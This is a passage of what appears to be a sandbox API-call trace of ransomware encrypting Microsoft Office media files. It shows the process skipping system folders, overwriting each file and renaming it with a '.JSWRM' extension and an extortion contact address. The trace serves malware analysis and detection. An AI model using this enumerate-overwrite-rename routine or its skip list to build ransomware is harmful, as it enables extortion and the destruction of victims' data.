lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x17c70, lpOverlapped=0x0) returned 1 [0134.973] CloseHandle (hObject=0x238) returned 1 [0134.973] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_abbrdialtone.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_abbrdialtone.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_abbrdialtone.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_abbrdialtone.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.974] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e558, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ActivePresenterChange.wav", cAlternateFileName="LYNC_A~1.WAV")) returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2=".") returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="..") returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="...") returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="windows") returned -1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="recovery") returned -1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="perflogs") returned -1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="documents and settings") returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="$RECYCLE.BIN") returned 1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="system volume information") returned -1 [0134.974] lstrcmpiW (lpString1="LYNC_ActivePresenterChange.wav", lpString2="msocache") returned -1 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ActivePresenterChange.wav", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ActivePresenterChange.wav", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ActivePresenterChange.wav", lpUsedDefaultChar=0x0) returned 30 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ActivePresenterChange.wav", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ActivePresenterChange.wav", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ActivePresenterChange.wav", lpUsedDefaultChar=0x0) returned 30 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ActivePresenterChange.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_activepresenterchange.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.976] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=255320) returned 1 [0134.976] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.976] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0134.987] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.987] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0134.987] CloseHandle (hObject=0x238) returned 1 [0134.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ActivePresenterChange.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_activepresenterchange.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ActivePresenterChange.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_activepresenterchange.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.013] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47c14, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_appinvite.wav", cAlternateFileName="LYNC_A~2.WAV")) returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2=".") returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="..") returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="...") returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="windows") returned -1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="recovery") returned -1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="perflogs") returned -1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="documents and settings") returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="system volume information") returned -1 [0135.013] lstrcmpiW (lpString1="LYNC_appinvite.wav", lpString2="msocache") returned -1 [0135.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_appinvite.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_appinvite.wav", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_appinvite.wav", lpUsedDefaultChar=0x0) returned 18 [0135.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_appinvite.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_appinvite.wav", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_appinvite.wav", lpUsedDefaultChar=0x0) returned 18 [0135.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_appinvite.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_appinvite.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.014] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=293908) returned 1 [0135.015] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.015] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.027] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.027] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.028] CloseHandle (hObject=0x238) returned 1 [0135.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_appinvite.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_appinvite.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_appinvite.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_appinvite.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.029] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3eba, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_busy.wav", cAlternateFileName="LYNC_B~1.WAV")) returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2=".") returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="..") returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="...") returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="windows") returned -1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="recovery") returned -1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="perflogs") returned -1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="documents and settings") returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="system volume information") returned -1 [0135.029] lstrcmpiW (lpString1="LYNC_busy.wav", lpString2="msocache") returned -1 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_busy.wav", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_busy.wav", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_busy.wav", lpUsedDefaultChar=0x0) returned 13 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_busy.wav", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_busy.wav", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_busy.wav", lpUsedDefaultChar=0x0) returned 13 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_busy.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_busy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.030] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16058) returned 1 [0135.030] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.031] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3eb0, lpOverlapped=0x0) returned 1 [0135.033] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.033] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3eb0, lpOverlapped=0x0) returned 1 [0135.033] CloseHandle (hObject=0x238) returned 1 [0135.033] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_busy.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_busy.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_busy.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_busy.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.034] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x275a8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_callended.wav", cAlternateFileName="LYNC_C~1.WAV")) returned 1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2=".") returned 1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="..") returned 1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="...") returned 1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="windows") returned -1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="recovery") returned -1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="perflogs") returned -1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="documents and settings") returned 1 [0135.034] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.035] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="system volume information") returned -1 [0135.035] lstrcmpiW (lpString1="LYNC_callended.wav", lpString2="msocache") returned -1 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_callended.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_callended.wav", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_callended.wav", lpUsedDefaultChar=0x0) returned 18 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_callended.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_callended.wav", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_callended.wav", lpUsedDefaultChar=0x0) returned 18 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_callended.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_callended.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.036] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=161192) returned 1 [0135.036] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.036] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.047] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.047] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.047] CloseHandle (hObject=0x238) returned 1 [0135.047] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_callended.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_callended.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_callended.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_callended.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.048] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e038, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ChangeModality.wav", cAlternateFileName="LYNC_C~3.WAV")) returned 1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2=".") returned 1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="..") returned 1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="...") returned 1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="windows") returned -1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="recovery") returned -1 [0135.048] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="perflogs") returned -1 [0135.049] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="documents and settings") returned 1 [0135.049] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.049] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="system volume information") returned -1 [0135.049] lstrcmpiW (lpString1="LYNC_ChangeModality.wav", lpString2="msocache") returned -1 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ChangeModality.wav", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ChangeModality.wav", cchWideChar=23, lpMultiByteStr=0x241218, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ChangeModality.wav", lpUsedDefaultChar=0x0) returned 23 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ChangeModality.wav", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ChangeModality.wav", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ChangeModality.wav", lpUsedDefaultChar=0x0) returned 23 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ChangeModality.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_changemodality.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.056] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=254008) returned 1 [0135.056] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.056] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.067] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.067] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.068] CloseHandle (hObject=0x238) returned 1 [0135.068] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ChangeModality.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_changemodality.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ChangeModality.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_changemodality.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.069] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2db6c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_connecting.wav", cAlternateFileName="LYNC_C~2.WAV")) returned 1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2=".") returned 1 [0135.069] 